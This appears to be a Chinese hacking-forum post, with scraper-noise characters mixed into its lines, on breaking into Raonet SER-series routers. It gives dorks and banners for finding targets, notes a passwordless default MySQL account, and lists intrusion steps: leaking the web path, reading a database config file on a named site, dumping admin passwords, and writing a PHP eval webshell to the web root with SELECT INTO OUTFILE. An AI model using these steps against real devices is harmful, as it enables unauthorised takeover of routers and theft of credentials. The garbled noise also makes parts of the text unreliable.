寻找存在漏洞的路由器方法:- @; J% H2 X# K) c8 `$ \
( s& K: E1 m+ K, s+ ~: v: @; m1:google搜索'Raonet Subscriber Ethernet Router'
; e2 g6 } F9 H; h! g7 P; s0 L a, f( U/ \
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# s9 h. k1 B( `6 p$ p" s" r) i0 R; f! S' Z+ t3 t' D
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。1 V, F1 g" }4 u' Q) }, U
; s. [" J4 C7 F; F
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......- N1 Z6 N1 V- C$ T0 u8 ^
% Q' f- C, x/ r" `; e4 p
# F' |! s; [- C4 s+ l. E. s2 v3 x
入侵步骤:; g" ]/ Q2 E2 a7 K
9 Y0 ?) W9 {* _5 w) N1 r( n
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
5 K4 u6 U* m" f7 R5 x$ u2 |
3 F5 l+ ~4 P* [. M1 V# X2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
/ E0 q( v0 [. S8 {: i. i3:得到密码后连接,查看GUI管理密码:. x0 \, |% G+ p$ ], @
use ser_500
: J- B, F. e5 X: J0 o; vselect id,passwd from user;0 K1 @" q) k7 M: v b" i& w& { g! x% l& u
4:通过数据库写入webshell,执行命令:! E" D- { w6 e; O- h
use mysql;/ w! U5 o; R$ V4 q
create table ok(cmd TEXT);/ p# }( K4 C6 V# v/ _% y7 q
insert into ok values("<?php @eval($_POST[cmd])?>");! Q" E' c: F3 G) B4 L. c ~( n; s3 W
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
2 S7 H( B G2 c% c' Sdrop table ok;0 K3 }( U6 a& |# ?
( R7 U! Z9 V9 p) x$ Z5 G6 l( _' _5:连接后门shell.php ) v& q* r' V) F% W/ W
' J) S& f8 R' b0 `) F! }: D
6. 搞定!* i" D6 B2 S1 {
3 v* d d1 |0 K) m
|